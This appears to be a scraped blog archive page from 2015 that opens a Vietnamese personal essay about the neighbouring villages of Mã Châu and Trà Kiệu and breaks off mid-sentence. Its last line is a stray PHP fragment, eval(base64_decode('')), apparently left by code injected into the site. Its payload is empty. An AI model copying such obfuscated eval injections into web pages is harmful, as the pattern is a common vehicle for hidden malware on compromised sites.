Archive for May 14th, 2015

Tâm bút cùng Trà Kiệu

Tâm bút cùng Trà Kiệu

Làng Phật Giáo Mã Châu, nơi tôi sinh ra, cách làng Công Giáo Trà Kiệu, nơi Th., bạn tôi, sinh ra, khoảng mười cây số và một con sông. Trong làng tôi, ngoài trừ gia đình người chú họ, sau khi đi làm ăn xa trở về làng cũ, trong hành trang của

05.14.2015 | Tâm Bút |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>